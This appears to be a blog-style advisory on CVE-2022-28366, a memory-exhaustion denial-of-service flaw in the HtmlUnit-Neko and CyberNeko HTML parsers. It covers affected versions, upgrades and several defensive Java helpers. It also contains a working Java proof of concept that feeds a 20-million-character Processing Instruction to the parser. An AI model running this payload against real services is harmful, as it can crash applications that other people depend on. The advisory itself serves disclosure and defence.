In web security, small overlooked details in a library can lead to big problems. CVE-2022-28366 is a good example: it affects common HTML parsing tools such as HtmlUnit-Neko and CyberNeko HTML, and it lets an attacker crash an application or slow it to a crawl simply by sending a crafted piece of HTML. In this post, we’ll break down how this happens, which libraries are at risk, walk through a simple code snippet that demonstrates the issue, and list references for further reading.
What Is CVE-2022-28366?
CVE-2022-28366 describes a security hole in certain Neko-related HTML parsers. By feeding the parser a specially crafted "Processing Instruction" (a part of XML and HTML that looks like <?something data?>), an attacker can make the software chew up huge amounts of memory. If unchecked, this can lead to a Denial of Service (DoS) where the system becomes unresponsive or crashes.
Projects that embed these parsers are affected as well, such as older versions of OWASP AntiSamy (before 1.6.6).
### Might Be Related to: CVE-2022-24839
Why Should I Care?
Many Java-based web applications use these libraries to sanitize or process HTML. If your app parses any kind of user input (like emails, posts, comments, uploads)—and you’re using these libraries without updates—someone could crash your services just with some crafty HTML.
How Does the Attack Work?
The vulnerability centers on how the parser handles Processing Instructions (PIs). When a very large or malformed PI arrives, the parser tries to process it anyway and keeps allocating heap memory for it, until the Java process runs out of memory or the server slows to a halt.
Suppose you’re parsing this innocent-looking piece of text:
<?foo xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx... (repeat for MBs) ...xxxxxxxxxx?>
A PI like the one above, with megabytes of filler between <? and ?>, can eat up all available heap memory.
Let’s walk through an example in Java that shows the problem, using CyberNeko HTML:
import java.io.StringReader;

import org.cyberneko.html.parsers.SAXParser;
import org.xml.sax.InputSource;
import org.xml.sax.helpers.DefaultHandler;

public class NekoHtmlDosDemo {
    public static void main(String[] args) throws Exception {
        // Build one oversized Processing Instruction: "<?foo AAAA...A?>"
        StringBuilder sb = new StringBuilder();
        sb.append("<?foo ");
        // This generates a PI with 20 million 'A's. Adjust as needed.
        for (int i = 0; i < 20_000_000; i++) {
            sb.append('A');
        }
        sb.append("?>");
        String exploit = sb.toString();

        InputSource is = new InputSource(new StringReader(exploit));
        SAXParser parser = new SAXParser();
        // A no-op handler is enough to drive the parse for this demo.
        parser.setContentHandler(new DefaultHandler());

        System.out.println("Parsing...");
        parser.parse(is); // This can cause OutOfMemoryError or long freezes
        System.out.println("Done.");
    }
}
Warning: Don’t run this on a production system. It’s for educational purposes only!
Affected Versions
- HtmlUnit-Neko: All versions up to 2.26 (fixed in 2.27)
- CyberNeko HTML: All versions up to (and including) 1.9.22 (no future fixes, as this is the end-of-life version)
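The version ranges from this post can be encoded in a small helper, for example to log a warning at startup. This is only a minimal sketch: the class name, the method names, and the library labels (`htmlunit-neko`, `nekohtml`, `antisamy`) are made up for illustration and are not real Maven coordinates, and the comparison assumes plain dotted numeric versions with no qualifiers such as `-SNAPSHOT`.

```java
public class AffectedVersionCheck {

    /** Compares dotted numeric versions such as "2.26" and "1.9.22". */
    public static int compareVersions(String a, String b) {
        String[] pa = a.split("\\.");
        String[] pb = b.split("\\.");
        int n = Math.max(pa.length, pb.length);
        for (int i = 0; i < n; i++) {
            // Missing components count as 0, so "2.27" equals "2.27.0".
            int x = i < pa.length ? Integer.parseInt(pa[i]) : 0;
            int y = i < pb.length ? Integer.parseInt(pb[i]) : 0;
            if (x != y) {
                return Integer.compare(x, y);
            }
        }
        return 0;
    }

    /** Applies the ranges stated in this post; the labels are hypothetical. */
    public static boolean isAffected(String library, String version) {
        switch (library) {
            case "htmlunit-neko": // affected up to 2.26, fixed in 2.27
                return compareVersions(version, "2.26") <= 0;
            case "nekohtml":      // affected up to and including 1.9.22
                return compareVersions(version, "1.9.22") <= 0;
            case "antisamy":      // affected before 1.6.6
                return compareVersions(version, "1.6.6") < 0;
            default:
                throw new IllegalArgumentException("Unknown library: " + library);
        }
    }

    public static void main(String[] args) {
        System.out.println(isAffected("htmlunit-neko", "2.26")); // true
        System.out.println(isAffected("htmlunit-neko", "2.27")); // false
        System.out.println(isAffected("antisamy", "1.6.5"));     // true
    }
}
```

In a real project a dependency scanner is the better tool for this job; the helper just makes the ranges explicit.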
Patch and Remediation
If you use HtmlUnit-Neko:
Upgrade to at least version 2.27.
If you use CyberNeko HTML:
No further versions will be released (last is 1.9.22). You must find an alternative or mitigate via input size limits or similar protections.
If you use OWASP AntiSamy:
Upgrade to at least version 1.6.6.
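For the input size limits mentioned under CyberNeko HTML, one possible approach is to wrap the reader you hand to the parser so that it fails fast once a character budget is exceeded. The sketch below uses only the JDK. `BoundedReader`, `fitsWithin`, and the limits shown are hypothetical names and values chosen for this post, and how the parser surfaces the resulting `IOException` has not been verified here.

```java
import java.io.FilterReader;
import java.io.IOException;
import java.io.Reader;
import java.io.StringReader;

/** A Reader wrapper that throws once more than maxChars characters were read. */
public class BoundedReader extends FilterReader {
    private final long maxChars;
    private long seen;

    public BoundedReader(Reader in, long maxChars) {
        super(in);
        this.maxChars = maxChars;
    }

    @Override
    public int read() throws IOException {
        int c = super.read();
        if (c != -1) {
            count(1);
        }
        return c;
    }

    @Override
    public int read(char[] buf, int off, int len) throws IOException {
        int n = super.read(buf, off, len);
        if (n > 0) {
            count(n);
        }
        return n;
    }

    private void count(int n) throws IOException {
        seen += n;
        if (seen > maxChars) {
            throw new IOException("Input exceeds limit of " + maxChars + " characters");
        }
    }

    /** Convenience check: drains the text through a BoundedReader. */
    public static boolean fitsWithin(String text, long maxChars) {
        char[] buf = new char[8192];
        try (Reader r = new BoundedReader(new StringReader(text), maxChars)) {
            while (r.read(buf, 0, buf.length) != -1) {
                // Keep reading until end of input or until the limit trips.
            }
            return true;
        } catch (IOException e) {
            return false;
        }
    }

    public static void main(String[] args) {
        System.out.println(fitsWithin("<p>hi</p>", 100));  // true
        System.out.println(fitsWithin("0123456789A", 10)); // false
    }
}
```

With the parser from the demo, this would be used as `new InputSource(new BoundedReader(reader, limit))`. The right limit depends on the largest legitimate document your application expects.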
References and Further Reading
- NVD Entry for CVE-2022-28366
- HtmlUnit changelog
- CyberNeko HTML 1.9.22 source
- OWASP AntiSamy GitHub
- Possible related issue: CVE-2022-24839
Additional Mitigations
- Monitor Inputs: Reject excessively large or weird-looking HTML, especially if user-supplied.
- Use Memory Limits: On your Java process, use JVM flags like -Xmx512m to limit heap size as a backstop.
- Switch Libraries: If you rely on CyberNeko HTML directly (which is no longer maintained), migrate to a supported HTML parser such as jsoup.
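As a rough illustration of the input-monitoring tip, the sketch below measures the longest PI-like span in a string so that the input can be rejected before it reaches the parser. It is a heuristic, not a model of how Neko scans PIs: it assumes a PI starts at `<?` and ends at the next `?>` (or at the end of the input if unterminated), which tends to overestimate rather than underestimate. The class name, method names, and the 1024-character threshold are hypothetical.

```java
public class PiLengthGuard {

    /** Returns the length of the longest "<?...?>" span, or 0 if there is none. */
    public static int longestPiLength(String html) {
        int longest = 0;
        int start = html.indexOf("<?");
        while (start != -1) {
            int end = html.indexOf("?>", start + 2);
            // An unterminated PI is treated as running to the end of the input.
            int stop = (end == -1) ? html.length() : end + 2;
            longest = Math.max(longest, stop - start);
            if (end == -1) {
                break;
            }
            start = html.indexOf("<?", stop);
        }
        return longest;
    }

    /** True if any PI-like span is longer than maxPiLength characters. */
    public static boolean isSuspicious(String html, int maxPiLength) {
        return longestPiLength(html) > maxPiLength;
    }

    public static void main(String[] args) {
        // A scaled-down version of the payload shape shown earlier in this post.
        StringBuilder sb = new StringBuilder("<?foo ");
        for (int i = 0; i < 5000; i++) {
            sb.append('A');
        }
        sb.append("?>");

        System.out.println(isSuspicious("<p>hello</p>", 1024)); // false
        System.out.println(isSuspicious(sb.toString(), 1024));  // true
    }
}
```

A check like this complements an overall size limit and a patched parser; it does not replace either of them.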
Summary:
CVE-2022-28366 shows how even obscure libraries can open the door to denial of service if left unpatched. Don’t let old dependencies take down your app: update today, and keep an eye on your supply chain.
Timeline
Published on: 04/21/2022 23:15:00 UTC
Last modified on: 05/04/2022 14:02:00 UTC